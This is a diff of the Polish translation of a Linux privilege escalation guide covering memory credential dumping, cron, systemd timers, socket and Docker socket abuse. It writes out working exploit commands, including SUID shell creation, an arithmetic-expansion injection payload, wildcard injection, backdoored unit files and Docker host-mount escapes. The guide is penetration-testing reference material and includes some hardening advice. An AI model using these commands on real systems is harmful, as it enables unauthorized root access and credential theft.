-ProcDump to wersja narzędzia ProcDump dla Linux, będąca reinterpretacją klasycznego narzędzia ProcDump z pakietu Sysinternals dla Windows. Pobierz ją z [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
+ProcDump to wersja dla Linux klasycznego narzędzia ProcDump z pakietu Sysinternals dla Windows. Pobierz ją z [https://github.com/Sysinternals/ProcDump-for-Linux](https://github.com/Sysinternals/ProcDump-for-Linux)
 ```
 procdump -p 1714
 
@@ -266,11 +266,11 @@ Press Ctrl-C to end monitoring without terminating the process.
 ```
 ### Narzędzia
 
-Aby zrzucić pamięć procesu, możesz użyć:
+Aby zrzucić pamięć procesu możesz użyć:
 
 - [**https://github.com/Sysinternals/ProcDump-for-Linux**](https://github.com/Sysinternals/ProcDump-for-Linux)
-- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Możesz ręcznie usunąć wymagania roota i zrzucić proces należący do ciebie
-- Script A.5 z [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (wymagany root)
+- [**https://github.com/hajzer/bash-memory-dump**](https://github.com/hajzer/bash-memory-dump) (root) - \_Możesz ręcznie usunąć wymagania root i zrzucić pamięć procesu należącego do Ciebie
+- Script A.5 from [**https://www.delaat.net/rp/2016-2017/p97/report.pdf**](https://www.delaat.net/rp/2016-2017/p97/report.pdf) (wymagany root)
 
 ### Poświadczenia z pamięci procesu
 
@@ -288,18 +288,18 @@ strings *.dump | grep -i password
 ```
 #### mimipenguin
 
-Narzędzie [**https://github.com/huntergregal/mimipenguin**](https://github.com/huntergregal/mimipenguin) będzie **kraść poświadczenia w postaci czystego tekstu z pamięci** oraz z niektórych **znanych plików**. Wymaga uprawnień root, aby działać prawidłowo.
+Narzędzie [https://github.com/huntergregal/mimipenguin](https://github.com/huntergregal/mimipenguin) będzie **kraść poświadczenia w postaci jawnego tekstu z pamięci** oraz z niektórych **dobrze znanych plików**. Wymaga uprawnień root, aby działać poprawnie.
 
-| Funkcja                                           | Nazwa procesu        |
+| Funkcja                                           | Nazwa procesu         |
 | ------------------------------------------------- | -------------------- |
-| GDM password (Kali Desktop, Debian Desktop)       | gdm-password         |
+| Hasło GDM (Kali Desktop, Debian Desktop)         | gdm-password         |
 | Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop) | gnome-keyring-daemon |
 | LightDM (Ubuntu Desktop)                          | lightdm              |
-| VSFTPd (Active FTP Connections)                   | vsftpd               |
-| Apache2 (Active HTTP Basic Auth Sessions)         | apache2              |
-| OpenSSH (Active SSH Sessions - Sudo Usage)        | sshd:                |
+| VSFTPd (aktywne połączenia FTP)                   | vsftpd               |
+| Apache2 (aktywne sesje HTTP Basic Auth)           | apache2              |
+| OpenSSH (aktywne sesje SSH - użycie sudo)         | sshd:                |
 
-#### Wyszukiwanie regexów/[truffleproc](https://github.com/controlplaneio/truffleproc)
+#### Wzorce wyszukiwania/[truffleproc](https://github.com/controlplaneio/truffleproc)
 ```bash
 # un truffleproc.sh against your current Bash shell (e.g. $$)
 ./truffleproc.sh $$
@@ -313,23 +313,23 @@ Reading symbols from /lib/x86_64-linux-gnu/librt.so.1...
 # finding secrets
 # results in /tmp/tmp.o6HV0Pl3fe/results.txt
 ```
-## Zaplanowane zadania/Cron jobs
+## Zadania zaplanowane/Cron jobs
 
 ### Crontab UI (alseambusher) running as root – web-based scheduler privesc
 
-Jeśli panel webowy “Crontab UI” (alseambusher/crontab-ui) działa jako root i nasłuchuje tylko na loopback, nadal możesz się do niego dostać przez SSH local port-forwarding i utworzyć privileged job, aby eskalować uprawnienia.
+Jeśli panel webowy “Crontab UI” (alseambusher/crontab-ui) działa jako root i jest powiązany tylko z loopback, nadal możesz uzyskać do niego dostęp przez SSH local port-forwarding i utworzyć uprzywilejowane zadanie w celu eskalacji.
 
-Typowy przebieg
-- Odkryj port dostępny tylko z loopback (np. 127.0.0.1:8000) i Basic-Auth realm za pomocą `ss -ntlp` / `curl -v localhost:8000`
+Typowy łańcuch
+- Odnajdź port dostępny tylko na loopback (np. 127.0.0.1:8000) i realm Basic-Auth za pomocą `ss -ntlp` / `curl -v localhost:8000`
 - Znajdź poświadczenia w artefaktach operacyjnych:
-- Kopie zapasowe/skrypty zawierające `zip -P <password>`
+- Kopie zapasowe/skrypty z `zip -P <password>`
 - jednostka systemd ujawniająca `Environment="BASIC_AUTH_USER=..."`, `Environment="BASIC_AUTH_PWD=..."`
 - Utwórz tunel i zaloguj się:
 ```bash
 ssh -L 9001:localhost:8000 user@target
 # browse http://localhost:9001 and authenticate
 ```
-- Utwórz zadanie o wysokich uprawnieniach i uruchom je natychmiast (tworzy SUID shell):
+- Utwórz zadanie z wysokimi uprawnieniami i uruchom natychmiast (tworzy SUID shell):
 ```bash
 # Name: escalate
 # Command:
@@ -340,12 +340,12 @@ cp /bin/bash /tmp/rootshell && chmod 6777 /tmp/rootshell
 /tmp/rootshell -p   # root shell
 ```
 Wzmacnianie bezpieczeństwa
-- Nie uruchamiaj Crontab UI jako root; ogranicz go do dedykowanego użytkownika i minimalnych uprawnień
-- Nasłuchuj na localhost i dodatkowo ogranicz dostęp za pomocą firewall/VPN; nie używaj ponownie haseł
-- Unikaj osadzania sekretów w unit files; używaj secret stores lub root-only EnvironmentFile
-- Włącz audit/logging dla wykonywania zadań na żądanie
+- Nie uruchamiaj Crontab UI jako root; ogranicz do dedykowanego użytkownika i minimalnych uprawnień
+- Nasłuchuj na localhost i dodatkowo ogranicz dostęp przez firewall/VPN; nie używaj ponownie haseł
+- Unikaj osadzania secrets w unit files; użyj secret stores lub EnvironmentFile dostępnego tylko dla root
+- Włącz audyt/logowanie dla wykonywania zadań na żądanie
 
-Sprawdź, czy którekolwiek zaplanowane zadanie jest podatne. Być może możesz wykorzystać skrypt uruchamiany przez root (wildcard vuln? czy możesz modyfikować pliki, których używa root? użyć symlinks? utworzyć konkretne pliki w katalogu, z którego korzysta root?).
+Sprawdź, czy któreś zaplanowane zadanie jest podatne. Być może możesz wykorzystać skrypt uruchamiany przez root (wildcard vuln? czy możesz modyfikować pliki, których używa root? użyć symlinks? utworzyć konkretne pliki w katalogu używanym przez root?).
 ```bash
 crontab -l
 ls -al /etc/cron* /etc/at*
@@ -353,9 +353,9 @@ cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/nul
 ```
 ### Cron path
 
-Na przykład, w pliku _/etc/crontab_ możesz znaleźć PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_
+Na przykład w pliku _/etc/crontab_ możesz znaleźć zmienną PATH: _PATH=**/home/user**:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin_
 
-(_Zwróć uwagę, że użytkownik "user" ma prawa zapisu do /home/user_)
+(_Zauważ, że użytkownik "user" ma uprawnienia do zapisu w /home/user_)
 
 Jeśli w tym crontabie użytkownik root próbuje wykonać jakąś komendę lub skrypt bez ustawienia PATH. Na przykład: _\* \* \* \* root overwrite.sh_\
 Wtedy możesz uzyskać root shell używając:
@@ -364,15 +364,15 @@ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
 #Wait cron job to be executed
 /tmp/bash -p #The effective uid and gid to be set to the real uid and gid
 ```
-### Cron uruchamiający skrypt zawierający wildcard (Wildcard Injection)
+### Cron używający skryptu z wildcard (Wildcard Injection)
 
-Jeśli skrypt uruchamiany przez root ma “**\***” w poleceniu, możesz to wykorzystać do wykonania nieoczekiwanych rzeczy (np. privesc). Przykład:
+Jeśli skrypt uruchamiany przez root ma “**\***” w poleceniu, możesz to wykorzystać do wywołania nieoczekiwanych zachowań (np. privesc). Przykład:
 ```bash
 rsync -a *.sh rsync://host.back/src/rbd #You can create a file called "-e sh myscript.sh" so the script will execute our script
 ```
-**Jeżeli wildcard jest poprzedzony ścieżką taką jak** _**/some/path/\***_ **, nie jest podatny (nawet** _**./\***_ **nie jest).**
+**Jeśli wildcard jest poprzedzony ścieżką taką jak** _**/some/path/\***_ **, nie jest podatny (nawet** _**./\***_ **nie jest).**
 
-Przeczytaj następującą stronę, aby poznać więcej sztuczek związanych z exploitacją wildcard:
+Read the following page for more wildcard exploitation tricks:
 
 
 {{#ref}}
@@ -380,13 +380,13 @@ wildcards-spare-tricks.md
 {{#endref}}
 
 
-### Bash arithmetic expansion injection in cron log parsers
+### Bash arithmetic expansion injection w parserach logów cron
 
-Bash wykonuje parameter/variable expansion oraz command substitution przed oceną arytmetyczną w ((...)), $((...)) i let. Jeśli root cron/parser odczytuje pola logów kontrolowane przez nieufne źródło i przekazuje je do kontekstu arytmetycznego, atakujący może wstrzyknąć command substitution $(...), który wykona się jako root, gdy cron zostanie uruchomiony.
+Bash wykonuje parameter expansion i command substitution przed oceną arytmetyczną w ((...)), $((...)) i let. Jeśli root cron/parser odczytuje niezaufane pola logów i podaje je do kontekstu arytmetycznego, atakujący może wstrzyknąć command substitution $(...), które wykona się jako root, gdy cron uruchomi się.
 
-- Why it works: In Bash, expansions occur in this order: parameter/variable expansion, command substitution, arithmetic expansion, then word splitting and pathname expansion. So a value like `$(/bin/bash -c 'id > /tmp/pwn')0` is first substituted (running the command), then the remaining numeric `0` is used for the arithmetic so the script continues without errors.
+- Why it works: W Bash rozszerzenia zachodzą w tej kolejności: parameter/variable expansion, command substitution, arithmetic expansion, a następnie word splitting i pathname expansion. Zatem wartość taka jak `$(/bin/bash -c 'id > /tmp/pwn')0` jest najpierw podstawiana (uruchamiając polecenie), a pozostała liczba `0` jest użyta w arytmetyce, dzięki czemu skrypt kontynuuje bez błędów.
 
-- Typowy podatny wzorzec:
+- Typical vulnerable pattern:
 ```bash
 #!/bin/bash
 # Example: parse a log and "sum" a count field coming from the log
@@ -396,126 +396,126 @@ while IFS=',' read -r ts user count rest; do
 done < /var/www/app/log/application.log
 ```
 
-- Eksploatacja: Spraw, aby tekst kontrolowany przez atakującego został zapisany w parsowanym logu tak, by pole wyglądające na liczbę zawierało command substitution i kończyło się cyfrą. Upewnij się, że twoje polecenie nie wypisuje nic na stdout (lub przekieruj jego wyjście), aby arytmetyka pozostała poprawna.
+- Exploitation: Spraw, by tekst kontrolowany przez atakującego został zapisany w parsowanym logu tak, aby pole wyglądające na liczbowe zawierało command substitution i kończyło się cyfrą. Upewnij się, że twoje polecenie nie wypisuje nic na stdout (lub przekieruj jego wyjście), aby arytmetyka pozostała poprawna.
 ```bash
 # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim):
 $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0
 # When the root cron parser evaluates (( total += count )), your command runs as root.
 ```
 
-### Cron script overwriting and symlink
+### Nadpisywanie skryptu cron i symlink
 
-Jeśli możesz **zmodyfikować cron script** uruchamiany przez root, możesz bardzo łatwo uzyskać shell:
+If you **możesz zmodyfikować skrypt cron** uruchamiany przez root, możesz bardzo łatwo uzyskać powłokę:
 ```bash
 echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > </PATH/CRON/SCRIPT>
 #Wait until it is executed
 /tmp/bash -p
 ```
-Jeśli script uruchamiany przez root używa **directory where you have full access**, może być przydatne usunąć ten folder i **create a symlink folder to another one**, który będzie serwował script kontrolowany przez Ciebie.
+Jeśli script uruchamiany przez root używa **katalogu, do którego masz pełny dostęp**, może być przydatne usunięcie tego folderu i **utworzenie symlink wskazującego na inny**, który zawiera script kontrolowany przez Ciebie
 ```bash
 ln -d -s </PATH/TO/POINT> </PATH/CREATE/FOLDER>
 ```
 ### Częste cron jobs
 
-Możesz monitorować procesy, by znaleźć takie, które są wykonywane co 1, 2 lub 5 minut. Możesz to wykorzystać i eskalować uprawnienia.
+Możesz monitorować procesy, aby wyszukać procesy, które są wykonywane co 1, 2 lub 5 minut. Być może możesz to wykorzystać i escalate privileges.
 
-Na przykład, aby **monitorować co 0.1s przez 1 minutę**, **posortować według najmniej wykonywanych poleceń** i usunąć polecenia, które były wykonywane najczęściej, możesz zrobić:
+Na przykład, aby **monitorować co 0.1s przez 1 minutę**, **posortować według rzadziej wykonywanych poleceń** i usunąć polecenia, które zostały wykonane najczęściej, możesz zrobić:
 ```bash
 for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; done; sort /tmp/monprocs.tmp | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort | grep -E -v "\s*[6-9][0-9][0-9]|\s*[0-9][0-9][0-9][0-9]"; rm /tmp/monprocs.tmp;
 ```
-**Możesz również użyć** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (narzędzie to będzie monitorować i wypisywać wszystkie procesy, które się uruchamiają).
+**Możesz też użyć** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (będzie monitorować i wyświetlać każdy proces, który się uruchamia).
 
 ### Niewidoczne cron jobs
 
-Możliwe jest utworzenie cronjobu **umieszczając znak powrotu karetki po komentarzu** (bez znaku nowej linii), a cron job nadal będzie działać. Przykład (zwróć uwagę na znak powrotu karetki):
+Możliwe jest utworzenie cronjob poprzez **putting a carriage return after a comment** (bez znaku newline), i cron job będzie działać. Przykład (zwróć uwagę na znak carriage return):
 ```bash
 #This is a comment inside a cron config file\r* * * * * echo "Surprise!"
 ```
 ## Usługi
 
-### Pliki _.service_ z prawem zapisu
+### Pliki _.service_ z zapisem
 
-Sprawdź, czy możesz zapisać dowolny plik `.service`, jeśli tak, możesz go **zmodyfikować** tak, aby **uruchamiał** Twój **backdoor** gdy usługa jest **uruchomiona**, **zrestartowana** lub **zatrzymana** (może będziesz musiał poczekać aż maszyna się zrestartuje).\
-Na przykład utwórz swój backdoor wewnątrz pliku .service z **`ExecStart=/tmp/script.sh`**
+Sprawdź, czy możesz zapisać jakikolwiek plik `.service`, jeśli tak, możesz go **zmodyfikować**, aby **wykonywał** Twój **backdoor, gdy** usługa zostanie **uruchomiona**, **zrestartowana** lub **zatrzymana** (może być konieczny reboot maszyny).\
+Na przykład umieść swój backdoor w pliku .service używając **`ExecStart=/tmp/script.sh`**
 
-### Zapisywalne binaria usług
+### Pliki binarne usług z zapisem
 
-Pamiętaj, że jeśli masz **uprawnienia zapisu do binariów uruchamianych przez usługi**, możesz je zmodyfikować tak, aby zawierały backdoors, dzięki czemu po ponownym uruchomieniu usług backdoors zostaną wykonane.
+Pamiętaj, że jeśli masz **uprawnienia zapisu do binarek uruchamianych przez usługi**, możesz je zmienić na backdoory, więc gdy usługi zostaną ponownie uruchomione, backdoory zostaną wykonane.
 
-### systemd PATH - ścieżki względne
+### systemd PATH - Ścieżki względne
 
 Możesz zobaczyć PATH używany przez **systemd** za pomocą:
 ```bash
 systemctl show-environment
 ```
-Jeśli stwierdzisz, że możesz **write** w którymkolwiek z folderów na ścieżce, możesz być w stanie **escalate privileges**. Musisz szukać plików konfiguracji usług używających **relative paths being used on service configurations**, takich jak:
+Jeśli okaże się, że możesz **zapisywać** w którymkolwiek z folderów na tej ścieżce, możesz być w stanie **escalate privileges**. Musisz wyszukać **ścieżek względnych używanych w plikach konfiguracji usług** takich jak:
 ```bash
 ExecStart=faraday-server
 ExecStart=/bin/sh -ec 'ifup --allow=hotplug %I; ifquery --state %I'
 ExecStop=/bin/sh "uptux-vuln-bin3 -stuff -hello"
 ```
-Następnie utwórz **wykonywalny plik** o **tej samej nazwie co relative path binary** w katalogu PATH systemd, do którego możesz zapisywać, a gdy usługa zostanie poproszona o wykonanie podatnej akcji (**Start**, **Stop**, **Reload**), twój **backdoor zostanie wykonany** (użytkownicy bez uprawnień zwykle nie mogą startować/zatrzymywać usług, ale sprawdź, czy możesz użyć `sudo -l`).
+Następnie utwórz **executable** o **tej samej nazwie co binarka z relatywnej ścieżki** wewnątrz folderu PATH systemd, do którego masz prawa zapisu, i gdy serwis zostanie poproszony o wykonanie podatnej akcji (**Start**, **Stop**, **Reload**), twój **backdoor zostanie wykonany** (użytkownicy bez uprawnień zazwyczaj nie mogą start/stop usług, ale sprawdź czy możesz użyć `sudo -l`).
 
 **Dowiedz się więcej o usługach za pomocą `man systemd.service`.**
 
 ## **Timery**
 
-**Timery** to pliki jednostek systemd, których nazwa kończy się na `**.timer**`, które kontrolują pliki lub zdarzenia `**.service**`. **Timery** mogą być używane jako alternatywa dla cron, ponieważ mają wbudowaną obsługę zdarzeń kalendarzowych i zdarzeń monotonicznych oraz mogą działać asynchronicznie.
+**Timery** to pliki jednostek systemd, których nazwa kończy się na `**.timer**`, które kontrolują pliki `**.service**` lub zdarzenia. **Timery** mogą być używane jako alternatywa dla cron, ponieważ mają wbudowane wsparcie dla zdarzeń opartych na czasie kalendarzowym i zdarzeń monotonicznych oraz mogą być uruchamiane asynchronicznie.
 
-Możesz wyświetlić wszystkie timery za pomocą:
+Możesz wyenumerować wszystkie timery za pomocą:
 ```bash
 systemctl list-timers --all
 ```
-### Zapisywalne timery
+### Timery z możliwością zapisu
 
-Jeśli możesz zmodyfikować timer, możesz sprawić, że uruchomi on niektóre jednostki systemd.unit (takie jak `.service` lub `.target`)
+Jeśli możesz zmodyfikować timer, możesz sprawić, że uruchomi on istniejące jednostki systemd.unit (np. `.service` lub `.target`).
 ```bash
 Unit=backdoor.service
 ```
-W dokumentacji możesz przeczytać, czym jest Unit:
+W dokumentacji można przeczytać, czym jest Unit:
 
-> The unit to activate when this timer elapses. The argument is a unit name, whose suffix is not ".timer". If not specified, this value defaults to a service that has the same name as the timer unit, except for the suffix. (See above.) It is recommended that the unit name that is activated and the unit name of the timer unit are named identically, except for the suffix.
+> Jednostka, która ma zostać aktywowana, gdy ten timer wygaśnie. Argumentem jest nazwa jednostki, której sufiks nie jest ".timer". Jeśli nie zostanie określone, ta wartość domyślnie wskazuje na service o tej samej nazwie co timer unit, z wyjątkiem sufiksu. (Zobacz wyżej.) Zaleca się, aby nazwa jednostki, która jest aktywowana, i nazwa jednostki timer były identyczne, z wyjątkiem sufiksu.
 
-W związku z tym, aby wykorzystać to uprawnienie musiałbyś:
+Therefore, to abuse this permission you would need to:
 
-- Znaleźć jakiś systemd unit (np. `.service`), który **uruchamia zapisywalny plik binarny**
-- Znaleźć jakiś systemd unit, który **uruchamia względną ścieżkę** i nad którym masz **uprawnienia zapisu** do **systemd PATH** (aby podszyć się pod ten plik wykonywalny)
+- Find some systemd unit (like a `.service`) that is **uruchamia binarkę, do której można zapisywać**
+- Find some systemd unit that is **uruchamia względną ścieżkę** and you have **prawa zapisu** over the **systemd PATH** (to impersonate that executable)
 
 **Dowiedz się więcej o timerach za pomocą `man systemd.timer`.**
 
-### **Włączanie Timera**
+### **Włączanie timera**
 
-Aby włączyć timer potrzebujesz uprawnień root i wykonania:
+Aby włączyć timer potrzebujesz uprawnień root i wykonać:
 ```bash
 sudo systemctl enable backu2.timer
 Created symlink /etc/systemd/system/multi-user.target.wants/backu2.timer → /lib/systemd/system/backu2.timer.
 ```
-Uwaga: **timer** jest **aktywowany** przez utworzenie dowiązania symbolicznego do niego w `/etc/systemd/system/<WantedBy_section>.wants/<name>.timer`
+Uwaga: **timer** jest **aktywowany** przez utworzenie symlinku do niego w `/etc/systemd/system/<WantedBy_section>.wants/<name>.timer`
 
 ## Gniazda
 
-Unix Domain Sockets (UDS) umożliwiają **komunikację między procesami** na tej samej lub różnych maszynach w modelach klient-serwer. Wykorzystują standardowe pliki deskryptorów Unix do komunikacji między komputerami i są konfigurowane przez pliki `.socket`.
+Unix Domain Sockets (UDS) umożliwiają **komunikację między procesami** na tej samej lub różnych maszynach w modelach klient‑serwer. Wykorzystują standardowe pliki deskryptorów Unix do komunikacji między komputerami i są konfigurowane przez pliki `.socket`.
 
-Gniazda można konfigurować przy użyciu plików `.socket`.
+Gniazda można konfigurować za pomocą plików `.socket`.
 
-**Dowiedz się więcej o gniazdach za pomocą `man systemd.socket`.** Wewnątrz tego pliku można skonfigurować kilka interesujących parametrów:
+**Dowiedz się więcej o gniazdach za pomocą `man systemd.socket`.** W tym pliku można skonfigurować kilka ciekawych parametrów:
 
-- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Te opcje różnią się, ale w skrócie służą do **wskazania, gdzie będą nasłuchiwać** na gniazdo (ścieżka pliku gniazda AF_UNIX, adres IPv4/6 i/lub numer portu do nasłuchiwania, itp.)
-- `Accept`: Przyjmuje argument boolean. Jeśli **true**, dla każdego przychodzącego połączenia tworzona jest **instancja usługi**, i jedynie gniazdo połączenia jest jej przekazywane. Jeśli **false**, wszystkie gniazda nasłuchujące są **przekazywane do uruchomionej jednostki serwisowej**, i tworzona jest tylko jedna jednostka serwisowa dla wszystkich połączeń. Ta wartość jest ignorowana dla gniazd datagramowych i FIFO, gdzie pojedyncza jednostka serwisowa bezwarunkowo obsługuje cały przychodzący ruch. **Domyślnie false**. Ze względów wydajnościowych zalecane jest pisanie nowych daemonów w sposób zgodny z `Accept=no`.
-- `ExecStartPre`, `ExecStartPost`: Przyjmują jedną lub więcej linii poleceń, które są **wykonywane przed** lub **po** utworzeniu i powiązaniu nasłuchujących **gniazd**/FIFO, odpowiednio. Pierwszy token linii poleceń musi być bezwzględną ścieżką pliku wykonywalnego, po którym następują argumenty dla procesu.
-- `ExecStopPre`, `ExecStopPost`: Dodatkowe **polecenia**, które są **wykonywane przed** lub **po** zamknięciu i usunięciu nasłuchujących **gniazd**/FIFO, odpowiednio.
-- `Service`: Określa nazwę jednostki **service**, którą należy **aktywować** przy **przychodzącym ruchu**. To ustawienie jest dozwolone tylko dla gniazd z Accept=no. Domyślnie wskazuje usługę o tej samej nazwie co socket (z zamienionym sufiksem). W większości przypadków nie powinno być konieczne używanie tej opcji.
+- `ListenStream`, `ListenDatagram`, `ListenSequentialPacket`, `ListenFIFO`, `ListenSpecial`, `ListenNetlink`, `ListenMessageQueue`, `ListenUSBFunction`: Te opcje różnią się między sobą, ale w skrócie służą do **wskazania miejsca nasłuchu** gniazda (ścieżka pliku AF_UNIX, IPv4/6 i/lub numer portu do nasłuchiwania itp.)
+- `Accept`: Przyjmuje argument boolean. Jeśli **true**, tworzona jest **instancja usługi dla każdego nadchodzącego połączenia** i przekazywany jest do niej tylko socket połączenia. Jeśli **false**, wszystkie nasłuchujące sockety są **przekazywane do uruchomionej jednostki service**, a dla wszystkich połączeń tworzona jest tylko jedna jednostka service. Ta wartość jest ignorowana dla gniazd datagramowych i FIFO, gdzie pojedyncza jednostka service bezwarunkowo obsługuje cały ruch przychodzący. **Domyślnie false**. Ze względów wydajnościowych zaleca się implementować nowe demony w sposób odpowiedni dla `Accept=no`.
+- `ExecStartPre`, `ExecStartPost`: Przyjmują jedną lub więcej linii poleceń, które są **wykonywane przed** lub **po** utworzeniu i powiązaniu (bound) nasłuchujących **socketów**/FIFO. Pierwszy token linii poleceń musi być absolutną ścieżką pliku, po której następują argumenty procesu.
+- `ExecStopPre`, `ExecStopPost`: Dodatkowe **polecenia**, które są **wykonywane przed** lub **po** zamknięciu i usunięciu nasłuchujących **socketów**/FIFO.
+- `Service`: Określa nazwę jednostki **service**, którą **aktywować** przy **ruchu przychodzącym**. To ustawienie jest dozwolone tylko dla gniazd z Accept=no. Domyślnie wskazuje usługę o tej samej nazwie co socket (z odpowiednio zmienionym sufiksem). W większości przypadków użycie tej opcji nie powinno być konieczne.
 
-### Zapisowalne .socket files
+### Writable .socket files
 
-Jeśli znajdziesz **zapisowalny** `.socket` plik możesz **dodać** na początku sekcji `[Socket]` coś w stylu: `ExecStartPre=/home/kali/sys/backdoor` i backdoor zostanie uruchomiony przed utworzeniem socketu. W związku z tym **prawdopodobnie będziesz musiał poczekać na restart maszyny.**\
-_Note that the system must be using that socket file configuration or the backdoor won't be executed_
+Jeśli znajdziesz **zapisowalny** plik `.socket`, możesz **dodać** na początku sekcji `[Socket]` coś w stylu: `ExecStartPre=/home/kali/sys/backdoor` i backdoor zostanie uruchomiony przed utworzeniem socketu. W związku z tym **prawdopodobnie będziesz musiał poczekać na reboot maszyny.**\
+_Uwaga: system musi używać tej konfiguracji pliku socket, w przeciwnym razie backdoor nie zostanie uruchomiony_
 
-### Zapisowalne gniazda
+### Writable sockets
 
-Jeśli **zidentyfikujesz jakiekolwiek zapisywalne gniazdo** (_mówimy tu teraz o Unix Sockets i nie o plikach konfiguracyjnych `.socket`_), to **możesz komunikować się** z tym gniazdem i być może wykorzystać podatność.
+Jeśli **zidentyfikujesz dowolne zapisowalne gniazdo** (_mówimy tu teraz o Unix Sockets, a nie o plikach konfiguracyjnych `.socket`_), to **możesz komunikować się** z tym gniazdem i być może wykorzystać podatność.
 
-### Enumeracja Unix Sockets
+### Enumerate Unix Sockets
 ```bash
 netstat -a -p --unix
 ```
@@ -537,28 +537,28 @@ socket-command-injection.md
 
 ### HTTP sockets
 
-Zwróć uwagę, że może istnieć kilka **sockets listening for HTTP** requests (_Nie mam na myśli .socket files, lecz plików działających jako unix sockets_). Możesz to sprawdzić za pomocą:
+Zauważ, że mogą istnieć pewne **sockets listening for HTTP** requests (_Nie mam na myśli plików .socket, lecz plików pełniących rolę unix sockets_). Możesz to sprawdzić poleceniem:
 ```bash
 curl --max-time 2 --unix-socket /pat/to/socket/files http:/index
 ```
-Jeśli socket **odpowiada na żądania HTTP**, możesz z nim **komunikować się** i być może **wykorzystać jakąś lukę**.
+Jeśli gniazdo **odpowiada na żądanie HTTP**, wtedy możesz **komunikować się** z nim i być może **wykorzystać jakąś podatność**.
 
-### Zapisalny socket Dockera
+### Zapisowalny Docker socket
 
-Socket Dockera, często znajdujący się pod `/var/run/docker.sock`, to krytyczny plik, który powinien być zabezpieczony. Domyślnie jest zapisywalny przez użytkownika `root` oraz członków grupy `docker`. Posiadanie dostępu zapisu do tego socketu może prowadzić do eskalacji uprawnień. Poniżej znajduje się opis, jak można to zrobić oraz alternatywne metody, jeśli Docker CLI nie jest dostępne.
+Docker socket, często znajdujący się pod `/var/run/docker.sock`, jest krytycznym plikiem, który powinien być zabezpieczony. Domyślnie jest zapisywalny przez użytkownika `root` i członków grupy `docker`. Posiadanie prawa zapisu do tego socketu może prowadzić do privilege escalation. Poniżej znajduje się rozbicie, jak można to zrobić oraz alternatywne metody, jeśli Docker CLI nie jest dostępne.
 
 #### **Privilege Escalation with Docker CLI**
 
-Jeśli masz dostęp zapisu do socketu Dockera, możesz eskalować uprawnienia, używając następujących poleceń:
+Jeśli masz prawo zapisu do Docker socket, możesz escalate privileges, używając następujących poleceń:
 ```bash
 docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
 docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh
 ```
-Te polecenia pozwalają uruchomić kontener z uprawnieniami roota do systemu plików hosta.
+Te polecenia pozwalają uruchomić kontener z uprawnieniami root do systemu plików hosta.
 
-#### **Korzystanie bezpośrednio z Docker API**
+#### **Używanie Docker API bezpośrednio**
 
-Jeśli Docker CLI nie jest dostępny, Docker socket można nadal obsłużyć za pomocą Docker API i poleceń `curl`.
+W przypadkach, gdy Docker CLI nie jest dostępne, Docker socket można nadal manipulować za pomocą Docker API i poleceń `curl`.
 
 1.  **List Docker Images:** Pobierz listę dostępnych obrazów.
 
@@ -566,7 +566,7 @@ Jeśli Docker CLI nie jest dostępny, Docker socket można nadal obsłużyć za
 curl -XGET --unix-socket /var/run/docker.sock http://localhost/images/json
 ```
 
-2.  **Create a Container:** Wyślij żądanie utworzenia kontenera, który montuje katalog główny hosta.
+2.  **Create a Container:** Wyślij żądanie utworzenia kontenera, które montuje katalog root systemu hosta.
 
 ```bash
 curl -XPOST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock -d '{"Image":"<ImageID>","Cmd":["/bin/sh"],"DetachKeys":"Ctrl-p,Ctrl-q","OpenStdin":true,"Mounts":[{"Type":"bind","Source":"/","Target":"/host_root"}]}' http://localhost/containers/create
@@ -588,31 +588,31 @@ Connection: Upgrade
 Upgrade: tcp
 ```
 
-Po nawiązaniu połączenia `socat` możesz wykonywać polecenia bezpośrednio w kontenerze z uprawnieniami roota do systemu plików hosta.
+Po skonfigurowaniu połączenia `socat` możesz wykonywać polecenia bezpośrednio w kontenerze z uprawnieniami root do systemu plików hosta.
 
 ### Inne
 
-Zauważ, że jeśli masz prawa zapisu do docker socket ponieważ jesteś **w grupie `docker`** to masz [**więcej sposobów na eskalację uprawnień**](interesting-groups-linux-pe/index.html#docker-group). Jeśli [**docker API nasłuchuje na porcie** możesz także być w stanie go przejąć](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
+Zauważ, że jeśli masz uprawnienia zapisu do docker socket, ponieważ należysz do grupy **`docker`**, masz [**more ways to escalate privileges**](interesting-groups-linux-pe/index.html#docker-group). Jeśli [**docker API is listening in a port** you can also be able to compromise it](../../network-services-pentesting/2375-pentesting-docker.md#compromising).
 
-Sprawdź **więcej sposobów na wydostanie się z docker lub wykorzystanie go do eskalacji uprawnień** w:
+Sprawdź **more ways to break out from docker or abuse it to escalate privileges** w:
 
 
 {{#ref}}
 docker-security/
 {{#endref}}
 
-## Containerd (ctr) eskalacja uprawnień
+## Containerd (ctr) privilege escalation
 
-Jeśli możesz użyć polecenia **`ctr`**, przeczytaj następującą stronę, ponieważ **możesz być w stanie wykorzystać je do eskalacji uprawnień**:
+Jeśli odkryjesz, że możesz użyć polecenia **`ctr`**, przeczytaj następującą stronę, ponieważ **you may be able to abuse it to escalate privileges**:
 
 
 {{#ref}}
 containerd-ctr-privilege-escalation.md
 {{#endref}}
 
